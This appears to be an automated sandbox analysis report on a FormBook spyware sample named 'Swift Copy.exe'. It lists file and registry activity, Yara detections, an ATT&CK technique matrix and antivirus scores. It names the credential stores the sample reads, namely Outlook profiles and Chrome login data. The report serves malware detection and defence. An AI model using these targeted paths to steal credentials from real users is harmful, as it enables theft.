Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Swift Copy.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Swift Copy.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Stealing of Sensitive Information

Yara detected FormBook

Source: Yara match	File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\SysWOW64\NETSTAT.EXE

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\NETSTAT.EXE

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Jump to behavior

Remote Access Functionality

Yara detected FormBook

Source: Yara match	File source: 8.0.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.Swift Copy.exe.34c7188.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000019.00000002.505547313.0000000002430000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.344237757.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000B.00000000.329946817.000000000D6E1000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.504953733.00000000003F0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000019.00000002.506999195.0000000002530000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000008.00000000.279374768.0000000000401000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.288109464.00000000034C7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Shared Modules	1 Scheduled Task/Job	712 Process Injection	11 Disable or Modify Tools	1 OS Credential Dumping	1 System Network Connections Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	3 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Scheduled Task/Job	Boot or Logon Initialization Scripts	1 Scheduled Task/Job	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 File and Directory Discovery	Remote Desktop Protocol	1 Data from Local System	Exfiltration Over Bluetooth	1 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	3 Obfuscated Files or Information	Security Account Manager	13 System Information Discovery	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	4 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	12 Software Packing	NTDS	221 Security Software Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	114 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	2 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	31 Virtualization/Sandbox Evasion	Cached Domain Credentials	31 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	712 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Masquerading	/etc/passwd and /etc/shadow	1 System Network Configuration Discovery	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Swift Copy.exe	21%	Virustotal		Browse
Swift Copy.exe	20%	ReversingLabs	ByteCode-MSIL.Spyware.Noon

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\ImUIYlbLTIh.exe	20%	ReversingLabs	ByteCode-MSIL.Spyware.Noon

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
8.0.RegSvcs.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
kinemartigues.com	1%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
